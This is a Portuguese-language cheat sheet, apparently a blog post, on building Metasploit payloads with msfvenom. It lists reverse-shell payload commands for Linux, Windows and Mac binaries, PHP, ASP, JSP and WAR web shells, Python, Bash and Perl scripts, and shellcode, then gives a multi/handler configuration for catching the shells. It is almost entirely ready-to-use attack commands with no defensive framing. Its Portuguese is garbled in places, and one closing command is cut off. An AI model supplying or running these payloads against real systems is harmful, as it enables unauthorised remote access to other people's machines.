Criando Payloads Metasploit

Muitas vezes, uma das habilidades mais úteis (e para o iniciante subestimada) de Metasploit é o módulo msfpayload. Várias cargas úteis podem ser criados com este módulo e ajuda algo que pode dar-lhe um shell em quase qualquer situação. Para cada uma destas cargas úteis que você pode entrar em msfconsole e selecione explorar / multi / manipulador. Execute 'carga do conjunto "para a carga em questão utilizada e configurar todas as opções necessárias (LHOST, LPORT, etc). Executar e aguarde a carga útil a ser executado. Para os exemplos abaixo que é bastante auto-explicativo, mas LHOST deve ser preenchido com o seu endereço IP (LAN IP se atacar dentro da rede, IP WAN se atacando em toda a internet), e LPORT deve ser a porta que você deseja ser ligado .

payloads lista

msfvenom -l

Binaries

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< seu IP > LPORT=< porta de coexão aberta > -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=< seu IP > LPORT=< porta de coexão aberta > -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=< seu IP > LPORT=< porta de coexão aberta > -f macho > shell.macho
Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=< seu IP > LPORT=< porta de coexão aberta > -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=< seu IP > LPORT=< porta de coexão aberta > -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=< seu IP > LPORT=< porta de coexão aberta > -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=< seu IP > LPORT=< porta de coexão aberta > -f war > shell.war
Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST=< seu IP > LPORT=< porta de coexão aberta > -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=< seu IP > LPORT=< porta de coexão aberta > -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=< seu IP > LPORT=< porta de coexão aberta > -f raw > shell.pl

Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< seu IP > LPORT=< porta de coexão aberta > -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=< seu IP > LPORT=< porta de coexão aberta > -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=< seu IP > LPORT=< porta de coexão aberta > -f <language>

Handlers

manipuladores Metasploit pode ser grande em configurar rapidamente Metasploit para estar em uma posição para receber as suas conchas de entrada. Manipuladores devem estar no seguinte formato.

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

Uma vez que os valores necessários são concluídos o seguinte comando irá executar o manipulador - 'msfconsole -L -r '
Compartilhar no WhatsApp